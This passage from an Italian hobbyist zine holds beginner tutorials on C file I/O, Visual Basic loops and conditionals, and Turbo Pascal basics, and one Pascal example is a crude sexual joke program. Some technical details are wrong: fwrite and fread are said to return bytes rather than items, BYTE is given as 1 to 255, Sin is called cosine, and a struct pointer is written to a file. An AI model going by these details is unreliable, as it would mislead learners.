in bytes, il terzo il numero di dati e il quarto il file.
sizeof ritorna la dimensione in bytes della variabile.

Es.

#include <stdio.h>

main(){
FILE *ilfile;
int inumeri[100];

ilfile = fopen("prova.prv","wb");
fwrite(inumeri,sizeof(inumeri[0]),100,ilfile);
fclose(ilfile);

}

In questo caso scriviamo nel file un intero array di int.
La & davanti al primo argomento in questo caso non e' necessaria, dato che
scrivendo il nome di un array senza numero ci si riferisce all'indirizzo in
memoria dove inizia l'array.
sizeof(inumeri[0]) ci da la dimensione di uno solo degli elementi dell'array,
mentre il terzo argomento (100) dice alla funzione di registrare 100 dati della
dimensione sizeof(inumeri[0]), dato che vogliamo registrare tutto l'array,
composto appunto da 100 elementi.
fwrite ha come valore di ritorno il numero di bytes che e' riuscito
effettivamente a scrivere nel file.

La funzione per leggere da un file corrispondente a fwrite e' fread, alla
quale dobbiamo passare gli stessi argomenti di fwrite.
Se ad esempio volessimo rileggere l'array salvato con l'esempio precedente...

#include <stdio.h>

main(){
FILE *ilfile;
int inumeri[100];

ilfile = fopen("prova.prv","rb");
fread(inumeri,sizeof(inumeri[0]),100,ilfile);
fclose(ilfile);

}

Come avrete gia' capito, fread ritorna invece il numero di bytes che e'
riuscito a leggere dal file (utile per accorgersi di un errore se il numero
e' inferiore a quello richiesto)

Un grosso vantaggio di fwrite e fread e' che fanno parte dello standard ANSI,
e garantiscono quindi una certa portatilita' ai programmi che accedono ai
file unicamente con queste due funzioni.


Per leggere o scrivere un solo carattere si usano invece putc e getc.


Es.

ilcarattere = getc(ilfile);
putc(ilcarattere,ilfile2);


Spesso capita di voler usare un ciclo generico per gestire file forniti
dall'utente. In questo caso possiamo usare la funzione feof(FILE *stream) per
controllare se il file e' terminato (la funzione ritorna nonzero) o no (la
funzione ritorna 0), con qualcosa di questo tipo :

while (!feof(inputf)){
fgetc(inputf);
}

--------

Passiamo ora a vedere come accedere ad un file in modo random.

Mentre in un file sequenziale leggevamo o scrivevamo byte uno dopo l'altro,
possiamo immaginare un file random come un insieme di elementi numerati,
chiamati record.
Il vantaggio e' possiamo accedere direttamente al record che ci interessa,
ricordando pero' che tutti i record devono essere della stessa dimensione.

Anche se il C non fa differenza tra i due tipi di file, di solito si accede
ad un file random in modo binario con fwrite e fread.
Quindi per accedere in lettura e scrittura apriremo il file in modo "r+b"
se il file esiste gia', in modo "w+b" se vogliamo crearlo.

Per accedere ad un certo record dobbiamo conoscerne la posizione nel file
ed andarci con la funzione fseek.

Es.


#include <stdio.h>

main(){
FILE *ilfile;

ilfile = fopen("prova.prv","rb");
fseek (ilfile,56L,SEEK_SET);
fclose(ilfile);

}


In questo caso va al byte 56 (L = in formato Long) di ilfile, a partire
da SEEK_SET, cioe' dall'inizio del file.

SEEK_SET = inizio del file
SEEK_CUR = posizione corrente
SEEK_END = fine del file


Noi pero' non vogliamo raggiungere un qualsiasi byte del file, ma l'inizio
del record che ci interessa.
Per fare cio' dovremo usare sizeof.

fseek(ilfile,(long)numerodelrecord*sizeof(record),SEEK_SET);

_____________________________________________________________________________

OOOPS! Una cosa che doveva essere spiegata nella prima parte :

il cast

scrivendo tra parentesi un tipo di variabili forziamo il compilatore a
considerare un valore come se fosse di quel tipo. In questo caso e' necessario
dato che fseek si aspetta come secondo argomento un valore di tipo long
_____________________________________________________________________________



Passiamo a un altro esempio. Se volessimo salvare i dati delle automobili
di quel gioco....


#include <stdio.h>

struct automobile{
char *nome;
int velmax;
long soldi;
};

main(){
FILE *ilfile;
struct automobile automobili[10];

ilfile = fopen("automob.sav","w+b");
fwrite(automobili,sizeof(automobile),10,ilfile);
fclose(ilfile);

}


In questo caso ogni record rappresenta i dati di un automobile.
Per accedere al terzo record scriveremo :


struct automobile auto1;

fseek(ilfile,(long)2*sizeof(auto1),SEEK_SET);
fread(&auto1,sizeof(auto1),1,ilfile);

Ci ritroveremo cosi' nella variabile auto1 i dati dell'automobile numero 3.



Ecco, mi sembra di aver spiegato le cose di base sulla gestione dei file.
Per piacere non mi e-mailate per dirmi che ho dimenticato di spiegare
qualcosa. Questo e' solo un tutorial con il quale cerco di spiegare il C
a chi non lo conosce, ma le cose piu' importanti si imparano sperimentando
da soli.

Se trovate questo tutorial troppo scemo, vi ricordo che questo tutorial
DEVE cominciare da zero (e conoscendo la mia coerenza c'e' da scommettere
che non andra' troppo lontano :)

Se invece trovate questo tutorial troppo difficile..... e che cazzo! It's
impossible!!!!!

ElectroRipper

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ VB TUTORIAL [ SECONDA PARTE ] ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

Bene, bene.... a quanto pare si continua!!!!
Sperando che abbiate capito qualcosa dal primo numero (ricordatevi che potete
scrivermi per qualsiasi cosa [ma ricordate che sono un NewBie] a ronin_111@hotmail.com)
.... si riparte!!!
L'altra volta abbiamo accennato ai cicli, ed abbiamo visto il ciclo FOR (che,
spero lo abbiate gia' capito, serve per quei cicli che vanno eseguiti un numero
preciso di volte). Oggi parliamo del ciclo DO/LOOP.
La principale differenza e' che qui non sappiamo quante volte il ciclo verra'
eseguito, e ne usciremo solo al verificarsi di una certa condizione. Ad esempio:

Sub Prova()
Dim Risposta as Integer
Do
Risposta = MsgBox ("Ciao, continua?", VbYesNo, "Prova")
Loop Until Risposta = 7
End Sub

Prima il MsgBox.... questa istruzione crea una finestra di messaggio.
La sintassi e': MsgBox(prompt[, buttons] [, title] [, helpfile, context])
dove:
prompt --> E' il messaggio che sara' visualizzato
buttons --> (facoltativa) Indica i pulsanti che saranno visualizzati
(vedi tabella dopo)
title --> (facoltativa) E' il titolo della finestra
helpfile--> (facoltativa) Indica il file di guida utilizzato per le
informazione relative al contesto
context --> (facoltativa) Indica il numero del contesto a cui si fa
riferimento nel file guida

Se viene usato helpfile, context diventa obbligatorio e viceversa (non ho
mai utilizzato queste due opzioni, diciamo che sono qui per completezza di
informazione, hehehe)

La variabile "buttons"
A seconda dei pulsanti che si vogliono visualizzare

VbOKOnly 0 Visualizza solo il pulsante OK.
VbOKCancel 1 Visualizza i pulsanti OK e Annulla.
VbAbortRetryIgnore 2 Visualizza i pulsanti Termina, Riprova, e Ignora.
VbYesNoCancel 3 Visualizza i pulsanti Si', No e Annulla.
VbYesNo 4 Visualizza i pulsanti Si' e No.
VbRetryCancel 5 Visualizza i pulsanti Riprova e Annulla.

A seconda di come apparira' la finestra

VbCritical 16 Visualizza l'icona di messaggio critico.
VbQuestion 32 Visualizza l'icona di richiesta di avviso.
VbExclamation 48 Visualizza l'icona di messaggio di avviso.
VbInformation 64 Visualizza l'icona di messaggio di informazione.

A seconda del pulsante predefinito

VbDefaultButton1 0 Il primo pulsante e' il predefinito.
VbDefaultButton2 256 Il secondo pulsante e' il predefinito.
VbDefaultButton3 512 Il terzo pulsante e' il predefinito.
VbDefaultButton4 768 Il quarto pulsante e' il predefinito

A seconda se la scelta e' obbligatoria per l'applicazione o il sistema

VbApplicationModal 0 Scelta obbligatoria nell'applicazione. L'utente
deve rispondere prima di poter continuare a
lavorare nell'applicazione corrente.
VbSystemModal 4096 Scelta obbligatoria nel sistema. Tutte le
applicazioni vengono sospese fino a quando
l'utente non risponde.

La variabile buttons deriva dalla somma delle opzioni corrispondenti alle nostre
scelte. Ad esempio:
se voglio visualizzare solo il pulsante OK, in stile di messaggio critico e
con priorita' sul sistema assegnero' il valore 4112 dato da 0 + 16 + 0 + 4096
se voglio visualizzare i pulsanti SI e NO, senza stile, con pulsante predefinito
il 2ø (NO), con priorita' solo sull'applicazione assegnero' il valore 260 dato
da 4 + 0 + 256 + 0
...
...

Per ogni gruppo e' possibile scegliere un'opzione (intendo dire che non e'
possibile mettere il primo pulsante come predefinito e pure il terzo, 8|;
oppure mettere come stile sia il messaggio di avviso che quello critico), e
il valore finale e' dato dalla loro somma (come gia' detto).
Inoltre e' possibile sostituire il valore con la costante associata (VbQuestion
e' la costante 32 che si riferisce allo stile di richiesta di avviso).
In questo caso, piu' opzioni vengono gestite con l'operatore "+". Ad esempio:
MsgBox "Prova", VbYesNo + VbSystemModal, "Titolo Prova"
Infine l'istruzione include le parentesi quando e' una funzione (cioe'
restituisce un risultato). Quindi:
Variabile = MsgBox ("Testo", VbYesNo) --> visualizza la finestra e memorizza
la risposta in Variabile
Msgbox "Testo", VbYesNo --> visualizza la finestra

I possibili risultati sono:
Costante Valore Significato
vbOK 1 OK
vbCancel 2 Annulla
vbAbort 3 Termina
vbRetry 4 Riprova
vbIgnore 5 Ignora
vbYes 6 Si'
vbNo 7 No


OOPS... mi sono dilungato un po. Torniamo al ciclo.
Come potete vedere, il ciclo visualizza una finestra di messaggio finche' non
premiamo il pulsante NO.
La parola UNTIL indica che il ciclo e' eseguito quando la condizione e' FALSA
(infatti, come diventa vera, usciamo dal ciclo)
Questa puo essere sostituita dalla parola WHILE che ha esattamente la funzione
opposta: il ciclo verra' eseguito quando la condizione e' VERA.
Quindi ad esempio, questo listato risulta uguale a quello precedente:
Do
Risposta = MsgBox ("Ciao, continua?", VbYesNo, "Prova")
Loop While Risposta = 6
Viene controllato che risposta sia uguale a 6 (SI) e, se vero, il ciclo si ripete.

In questi casi, pero, si entra nel ciclo sempre almeno una volta.... potremmo
pero' non volere eseguire il ciclo nemmeno una volta.
Possiamo quindi mettere la condizione di esecuzione del ciclo all'inizio:
Do While Risposta = 6
Risposta = MsgBox ("Ciao, continua?", VbYesNo, "Prova")
Loop
Con questo listato per entrare nel ciclo la variabile Risposta deve gia' avere
il valore 6, altrimenti le istruzioni all'interno del ciclo saranno completamente
ignorate e l'esecuzione del programma riprendera' dall'istruzione seguente LOOP.
Anche in questo caso e' possibile usare WHILE o UNTIL.

Infine diciamo che la condizione puo' essere composta da piu' relazioni legate
da operatori logici.
Ad esempio con "Do While Risposta = 6 And Fine = 1" il ciclo viene eseguito
solo se Risposta e' uguale a 6 E Fine e' uguale ad 1; basta che una delle due
condizioni sia falsa per uscire dal ciclo.
Gli relazioni possono essere anche a carattere gerarchico (cioe' si possono
utilizzare le parentesi).
Do While Risposta = 6 And (Fine = 1 Or Inizio = 1)
Non vi dico il significato di questa istruzione.... cercate di capire quando
si esce dal ciclo!!!!

Ecco i principali operatori logici che potete usare in Visual Basic:
*** AND
Espressione1 Espressione2 Risultato
True True True
True False False
False True False
False False False
Restituisce True solo se tutte le espressioni hanno valore True

*** OR
Espressione1 Espressione2 Risultato
True True True
True False True
False True True
False False False
Restituisce True solo se almeno una delle espressioni ha valore True

*** NOT
Espressione Risultato
True False
False True
Inverte il valore della variabile

*** XOR
Espressione1 Espressione2 Risultato
True True False
True False True
False True True
False False False
Restituisce True se i due valori sono diversi tra loro

*** IMP
Espressione1 Espressione2 Risultato
True True True
True False False
False True True
False False True
Mai usato... se qualcuno capisce in base a che principio funziona me lo dica;p
(la guida dice: "Utilizzato per stabilire un'implicazione logica tra due espressioni")

*** EQV
Espressione1 Espressione2 Risultato
True True True
True False False
False True False
False False True
Praticamente l'opposto di XOR

Prima di finire con i cicli diciamo che possono essere nidificati (cioe' uno
dentro un altro) e che, in quel caso, l'istruzione di chiusura (LOOP per il
ciclo DO, NEXT per il ciclo FOR) si riferisce all'inizio piu' vicino ancora
aperto:
DO
{istruzioni}
DO
{altre_istruzioni}
LOOP
LOOP
Il primo LOOP si riferisce al secondo DO (quello aperto piu' vicino) e lo
chiude... il secondo LOOP chiude il primo DO.
N.B. Quando chiudete un ciclo FOR ricordate di mettere il giusto contatore
vicino all'istruzione NEXT o verra' generato un errore.
E anche questa e' fatta!!!
I cicli principale sono questi.


Passiamo ora all'esecuzione condizionale. Si tratta semplicemente di istruzioni
che vengono eseguite solo se si verificano (o meno) certe condizioni.

La prima e' sicuramente l'IF.
Sub Main()
Dim Risposta as integer
Risposta = MsgBox ("Ciao, continua?", VbYesNo, "Prova")
If Risposta = 6 then
MsgBox "Ok, let's go on"
End If
End Sub

In questa routine chiediamo se si vuole continuare e se la risposta e' SI
viene visualizzata un'altro messaggio.
La struttura e':
If condizione1 then
{blocco_istruzioni1}
Else
{blocco_istruzioni2}
End If
Se la condizione risulta vera, verra' eseguito il blocco_istruzioni1; se falsa,
il blocco_istruzioni2. ELSE indica quello che deve essere fatto se la condizione
risultasse falsa (e' opzionale, vedi l'esempio).
E' possibile controllare diverse condizioni, ad esempio:

If condizione1 then
{blocco_istruzioni1}
ElseIf condizione2 then
{blocco_istruzioni2}
Else
{blocco_istruzioni3}
End If

In questo caso se condizione1 e' falsa viene controllata condizione2 che, se
vera, portera' all'esecuzione del blocco_istruzioni2. Se sono tutte false si
esegue l'ELSE. E' possibile mettere tutti gli ELSEIF che si vuole e l'ELSE
verra' eseguito solo se TUTTI i precedenti risultano essere falsi.
Anche le IF, naturalmente, possono essere nidificate, e in questo caso ogni
End If si riferisce all'If piu' vicino ancora aperto.
Tra le condizioni, come nel ciclo DO/LOOP, e' possibile mettere delle relazioni
logiche utilizzando gli operatori sopra descritti (ad es. If A = 1 Or B = 2 then.....).

Esiste inoltre un metodo per valutare una variabile e reagire di conseguenza:
Select Case variabile
Case controllo1
{Istruzioni1}
Case controllo2
{Istruzioni2}
...
...
Case Else
{Istruzioni_Else}
End Select

variabile e' cio' che viene messo a confronto con i vari CASE. Se variabile
corrisponde ad esempio a controllo1 verra' eseguito istruzioni1, e cosi' via...
Se nessun controllo da esito positivo viene eseguito il CASE ELSE (facoltativo).
Ad esempio:

Select Case Voto
Case 10
MsgBox "Bravo"

Case 6 to 9
MsgBox "Bravetto"

Case 3, 4, 5
MsgBox "Applicati"

Case is < 3
Msgbox "SFATICATO!!!!"

Case Else
MsgBox "Errore"

End Select

In questo esempio si vedono le sintassi che possono avere i CASE:
1ø Case 10 --> Controlla se e' uguale a 10
2ø Case 6 to 9 --> Controlla se appartiene all'intervallo da 6 a 9
3ø Case 3, 4, 5 --> Controlla se e' uguale a 3, a 4 o a 5 (avremmo potuto scrivere CASE 3 to 5)
4ø Case is < 3 --> Controlla se e' minore di 3
Come parametro per il CASE e' possibile mettere un valore (1ø), un intervallo (2ø), o piu' condizioni staccate da una virgola (3ø).
E' infine possibile utilizzare la parola chiave IS con gli operatori di confronto =, >, =>, <, <= (4ø)

R0n|n

ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ

ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º
º³ PASCAL TUTORIAL [ PRIMA PARTE ] ³º
ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº
ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ

_____
/(_ _) _____ ____ _ _
ÿ\ ( ) /( ___ ) (ÿ( )ÿ ( ) ( )
\ÿ\( ) /( ( ) ) )ÿ) (ÿÿ ( )( )
\ÿ( ) \( (___) ) (ÿ( \ÿÿ( ) ( )
\(_) \(_____) \ÿ\ \ÿ( ) ( )

|\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/|
| Corso a puntate di Turbo Pascal |
|/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\|
| ×××××××××××××××××××××××××××××××××× |
| |
| × Le cose fondamentali da sapere × |
|____________××××××××××××××××××××××××××××××××××__________________________|

Imparare un linguaggio di programmazione non e' mai facilee spesso si ricorre
a studiarli forzatamente per necessita'.Ora, sperando che lo finisca, vi
presentero' un corso basatosu uno dei linguaggi di programmazione
fondamentali, non percio' che riesce a fare ma per il semplice motivo che e'
stato uno dei primi linguaggi di programmazione a livello alto. A noi non
interessa tanto sfruttarlo per nostre applicazioni mabensi' come base che ci
fara' capire come funziona un linguaggio di programmazione un po' piu'
complesso.Allora, credo che a questo punto possiamo iniziare:(Azz! Ho finito
le siga...e pensare che le ho comprate 6 ore fa..sigh!)Un programma in
Pascal, che utilizza solo le istruzioni di base, e' formato generalmente da
tre sezioni:--INTESTAZIONE----DICHIARAZIONI----ISTRUZIONI--Nell'intestazione
viene specificato il nome del programma.Nelle dichiarazioni vengono descritti
in modo formale glioggetti su cui il programma dovra' operare.Nelle istruzioni
abbiamo le operazioni in cui vengono descrittele azioni da compiere,
collegandole tra loro con opportune strutture di controllo. Ecco lo
schema:

PROGRAM NOMEDELPROGRAMMA;
<-----INTESTAZIONE
......<-----DICHIARAZIONI
...BEGIN...
......<----- ISTRUZIONI (ALLINEATE SEMPRE SOTTO IL TERZO CARATTERE)
...END. <----- INDICA LA FINE DEL PROGRAMMA (QUANDO C'E' IL . )
Di solito l'intestazione viene ignorata dalla cpu mentre nell'end finale ci
vuole sempre il punto.

->DICHIARAZIONI<-

In un programma che usa solo le strutture di base, questa sezione e' divisa in
tre part:La dichiarazione dei moduli usati dal programma (clausola USES) La
dichiarazione delle costanti (clausola CONST) La dichiarazione delle variabili
(clausola VAR)-->LA DICHIARAZIONE DEI MODULI<--Il Pascal, come succede ormai
per la maggior parte dei linguaggi, mette a disposizionedel programmatore
diverse librerie di sottoprogrammi di utilita'(moduli).Tra i moduli standard
ricordiamo:¹ Il modulo Crt, che contiene le procedure e funzioni che consentono
di sfruttare in modo piu' efficiente le potenzialita' della tastiera e del video²
Il modulo Printer, che contiene le procedure necessarie alla gestione della
stampante³ Il modulo Graph, contenente tutte le procedure e le funzioni legate
alla gestione grafica dello schermoLa sintassi della dichiarazione di uno o
piu' moduli e' questa:USES nome del modulo,nome del modulo,....,nome del modulo

;-->La dichiarazione delle costanti<--

In Pascal e' possibile gestire due classi di costanti: quelle espresse da noi
nel programmaattraverso assegnazione e quelle che vengono dichiarate nella
sezione di dichiarazione e sono precedute dalla parola chiave CONST.ES.CONST
gravita':=9.81; pigreco:=3.14

;-->La dichiarazione delle variabili<--

Tutte le variabili usate nel programma devono essere dichiarate, con
l'indicazione del tipo,nell'apposita sezione che inizia con la parola chiave
VAR.Ecco la sintassi:Var nome della variabile:tipo; nome della variabile,...
..,nome della variabile:tipo;Il nome della variabile e' attribuito da noi,
mentre il tipo dobbiamo sceglierlo tra i seguenti:
____________________________________________________________________
| TIPO DESCRIZIONE OCCUPAZIONE |
|____________________________________________________________________|
| | CONTIENE I NUMERI COMPRESI TRA | |
| BYTE | 1 A 255 | 1 BYTE |
| | | |
|________|_____________________________________|_____________________|
| | PERMETTE DI RAPPRESENTARE TUTTI I | |
| REAL | VALORI DECIMALI COMPRESI TRA: | 6 BYTE |
| | ±2.9 * 10 ^-38 A ±1.7 * 10^38 | |
|________|_____________________________________|_____________________|
| | CONSENTE DI RAPPRESENTARE VALORI | |
|INTEGER | INTERI RELATIVI COMPRESI TRA: | 2 BYTE |
| | -32768 E +32767 | |
|________|_____________________________________|_____________________|
| | CONSENTE DI RAPPRESENTARE GLI INTERI| |
|LONGINT | COMPRESI TRA: | 4 BYTE |
| | -2147473648 E +2147483647 | |
|________|_____________________________________|_____________________|
| | PERMETTE DI RAPPRESENTARE TUTTI | |
| CHAR | I CARATTERI APPARTENENTI | 1 BYTE |
| | ALL'ALFABETO ASCII | |
|________|_____________________________________|_____________________|
| | PERMETTE DI RAPPRESENTARE UNA | |
| STRING | QUALSIASI SEQUENZA DI CARATTERI LA | FINO A 255 BYTE |
| | CUI LUNGHEZZA VARIA DA 1 A 255 | |
|________|_____________________________________|_____________________|
| | PERMETTE DI RAPPRESENTARE I DUE | |
|BOOLEAN | VALORI LOGICI TRUE E FALSE | 1 BYTE |
| | | |
|________|_____________________________________|_____________________|

-->L'ASSEGNAZIONE<--

L'assegnazione permette di memorizzare un valore in una locazione di memoria.
La sintassi e' questa:nome della variabile:=valore o espressione;Non dimenticate
che ogni assegnazione va chiusa con il punto e virgola.

-->LE PROCEDURE DI INPUT/OUTPUT<--

La procedura che in Pascal consente di acquisire dati attraverso tastiera e'
READLN. La sintassi e' questa:
READLN(VARIABILE);
oppure
READLN(VARIABILE1,VARIABILE2,...,VARIABILEn);La cpu attende che l'operatore
digiti qualcosa da memorizzare nella rispettivalocazione di memoria. Anche
quest'istruzione ha bisogno di essere chiusa da un punto e virgola.
L'istruzione per visualizzare un messaggio di output sullo schermo e' WRITELN.
Sintassi:
WRITELN(NOME DELLA VARIABILE);
oppure
WRITELN(NOME DELLA VARIABILE,NOME DELLA VARIABILE2,...,NOME DELLA VARIABILEn);
oppure
WRITELN('CIAO LAMER');I primi due mostrano il contenuto delle variabili,
mentre il terzo mostra un messaggio sullo schermo. Quando bisogna visualizzare
un messaggio a video, il testo deve esserecontenuto tra due apici. Per
ottenere, invece, l'output sulla stampante bisogna , quando dichiariamo i moduli,
specificare il modulo PRINTER e usare l'opzione LST in questo modo:
WRITELN(LST'sAlVe SoNo UnA sTaMpA')

;->LE ISTRUZIONI STRUTTURATE<-

Le istruzioni strutturate si dividono in tre tipi:
»»»»SEQUENZA«««««»»»»SELEZIONE««««»»»»ITERAZIONE«««

-->SEQUENZA<--

La sequenza e' una struttura in cui le istruzioni strutturate che la compongono
vengono eseguiteuna dopo l'altra nell'ordine indicato. In Pascal questa
struttura e' racchiusa tra le istruzioniBEGIN e END e al suo interno ogni
istruzione e' suddivisa dalla successiva attraverso il ; Faccio un esempio di
un programma primitivo:
PROGRAM UTENGLUONG; (* QUESTO E' UN COMMENTO *)
VAR A,B,C:INTEGER; {ANCHE QUESTO}
BEGIN WRITELN ('INSERISCI I DUE NUMERI DA SOMMARE');
READLN(A,B); (* LEGGE UN NUMERO CHE NON DEVE SUPERARE LA CIFRA ±32767 *)
C:=A+B; (*CALCOLA LA SOMMA E LA MEMORIZZA NELLA VARIABILE C*)
WRITELN ('LA SOMMA E'' ',C); (*STAMPA LA SOMMA*)END.
...IF A<0 .... CIOÉ SE A É MINORE DI 0
...IF A=0 .... CIOÉ SE A É UGUALE A 0
...IF A<=0 ... CIOÉ SE A É MINORE O UGUALE A 0
...IF A>=0 ... CIOÉ SE A É MAGGIORE O UGUALE A 0
...IF A<>0 ... CIOÉ SE A É DIVERSO DA 0 ...

Esempio di un programma con selezione:
PROGRAM UTENGTUOST; (* QUESTO PROGRAMMA CONFRONTA DUE NUMERI *)
VAR A,B:INTEGER;BEGIN WRITELN ('INSERISCI DUE NUMERI');
READLN(A,B); IF A>B THEN WRITELN ('IL PIU'' GRANDE E'' ',A);
(* VERIFICA SE A É MAGGIORE DI B O VICEVERSA *)
IF A<B THEN WRITELN ('IL PIU'' GRANDE E'' ',B);
IF A=B THEN WRITELN ('SONO UGUALI');
(* VERIFICA SE SONO UGUALI *)END.

-->ITERAZIONE<--

I cicli iterativi servono per ripetere piu' volte un determinato numero di
istruzioni sotto ilcontrollo di una condizione booleana.Esistono tre tipi
di cicli:il ciclo WHILE, il ciclo REPEAT e il ciclo FOR.Il ciclo WHILE esegue
le istruzioni se la condizione e' vera ed esce se la condizione e' falsa.WHILE
CONDIZIONE DO BEGIN ISTRUZIONI DA RIPETERE; END;Il ciclo REPEAT esegue
le istruzioni se la condizione e' falsa ed esce se e' vera.REPEAT ISTRUZIONI
DA RIPETERE;UNTIL CONDIZIONE;Il ciclo FOR e' simile al WHILE ma ripete fino a
quando specificato nella condizione.
FOR CONDIZIONE DO BEGIN ISTRUZIONI DA RIPETERE;
END;Ogni ciclo possiede un contatore. Il contatore deve essere inizializzato
fuori dal ciclo eaumentato dentro al ciclo o viceversa, tranne con il FOR.Ora
vi mostro un programma che sfrutta tutti e tre i cicli:
PROGRAM SONOUNFRISCONE;
(* QUESTO PROG NON SERVE A NIENTE *)
USES CRT;
VAR K,CAZZO,I,VAGINA,SEGA:INTEGER;
NOME:STRING[15]; (* IL 15 TRA [] SIGNIFICA CHE LA PAROLA PUo' ESSERE LUNGA 15 CARATTERI *)
CHIAVAMI:BOOLEAN;
BEGIN REPEAT (* CONTROLLA SE K E' MAGGIORE DI 0 *)
WRITELN ('INSERISCI QUANTE TE NE VUOI CHIAVARE');
READLN(K);
UNTIL K>0;
WRITELN ('QUANTO CM CE L''HAI LUNGO?');
READLN(CAZZO);
WRITELN ('QUANTI CM CE L''HA LARGA, LEI? ');
READLN(VAGINA);
IF CAZZO>VAGINA THEN SEGA:=CAZZO-VAGINA;
IF VAGINA>CAZZO THEN SEGA:=VAGINA-CAZZO;
IF SEGA>10 THEN WRITELN ('AHIAHIAHI SEI FUORI DALLA MEDIA, VEDIAMO DI RECUPERARE!');
DELAY(3000); (*QUESTO COMANDO SERVE PER ASPETTARE ALCUNI SECONDI PRIMA DI CONTINUARE *)
CLRSCR; (* QUESTO COMANDO SERVE PER PULIRE LO SCHERMO *)
WRITELN ('IL TUO CAZZO DOVREBBE ESSERE COSI'' ');
DELAY(2000);
(*ASPETTA UN ALTRO PO'*)
WRITELN ('');
WRITELN (' ___ ____ ');
WRITELN (' / | \ ');
WRITELN (' ( ) ');
WRITELN (' \ / ');
(* RIPETE IL CICLO DA 1 A SEGA*)
FOR I:=1 TO SEGA DO
WRITELN (' | | ');
WRITELN (' / \ ');
WRITELN (' ( ) ');
WRITELN ('( () )');
WRITELN (' ( ( ( ) ');
WRITELN (' ((( ))) ');
DELAY(5000);
(*MI SON ROTTO DI ASPETTARE*)
CLRSCR;
WRITELN ('COME TI CHIAMI?');
READLN (NOME);
WRITELN ('ALLORA ',NOME,' CERCHIAMO DI FAR LUCE SU QUESTO CASO');
DELAY(3000);
(*UFF*) I:=1;
(* INIZIALIZZA IL CONTATORE AD 1 *) CHIAVAMI:=FALSE;
(* INIZIALIZZA LA VARIABILE BOOLEANA A FALSE *)
WHILE (I<=K) AND (CHIAVAMI=FALSE) DO
BEGIN
WRITELN ('IL ',I,'ø GIORNO TE NE TIRI ',SEGA);
IF SEGA=0 THEN CHIAVAMI:=TRUE;
(* SE SEGA E' UGUALE A ZERO DICHIARA F=TRUE*) SEGA:=SEGA-1;
I:=I+1;
END;
(* IL CICLO SI FINISCE SE F É TRUE E SE I HA RAGGIUNTO K*)END.
E' ovvio che guardando questo prog non riusciate a capire cosa faccia, vabbe'
quello e' normale! Neanche io ho capito che fa! L'importante e' aver capito
come funziano i cicli. Credo che per ora basta cosi', per il continuo mi
raccomando non perdete di vistala rivista che se l'avete gia' vista avete
preso una svista e per ora ben vista'.La prox volta vedremo le strutture non
primitive, gli array e qualcos'altro...;-3Per ora sbizzaritevi con questi
comandi ;-PABS(X)Calcola il valore assoluto di xArcTan(X)Calcola al'arcotangente
in radianti di XChr(CODICE)Restituisce il carattere che ha il codice ASCII
specificatoCopy(STRINGA,POSIZIONE,NUMEROCARATTERI)Estrae dalla stringa una
sottostringa formata dal numero di caratteri specificatopresi a partire dalla
posizione indicata.Cos(X)Calcola il coseno di un angolo in radiantiDelay
(MILLISEC)Interrompe l'esecuzione del programma per il tempo specificato
Delete(STRINGA,POSIZIONE,NUMEROCARATTERI)Elimina dalla stringa un certo
numero di caratteri a partire dalla posizione specificata. Exp(X)Calcola il
valore della funzione esponenziale e^xFrac(X)Calcola la parte frazionaria,
compresa tra 0 e 1, di un numero realeInsert(NUOVA,ORIGINALE,POSIZIONE)
Inserisce i caratteri della nuova stringa all'interno della stringa
originaleInt(x)Calcola la parte intera di un numero realeLenght(STRINGA)
Restituisce il numero di caratteri che compongono la stringaLn(X)Calcola il
logaritmo naturaleOrd(CARATTERE)Restituisce il codice ASCII del caratterePi
Restituisce il valore della costante pigreco con 18 cifre decimaliRandom(N)
Resituisce un numero casuale intero compreso tra 0 e N-1RandomizeQuesta
funzione si deve inizializzare se si vuole usare il comando RandomRound(X)
Arrotonda un numero reale all'intero piu' vicinoSin(X)Calcola il coseno di un
angolo in radiantiSqr(X)Calcola il quadratoSqrt(x)Calcola la radice quadrata
di un numero realeStr(VALORE,STRINGA)Genera la stringa di caratteri corrispon
dente al valore numerico

  
specificatoStr(STRINGA,VALORE)Genera il valore
corrispondente alla stringa di caratteri specificataTrunc(X)Elimina la parte
decimale di un numero reale.

T0rment0
urkes@hotmail.com
http://come.to/hackernovello

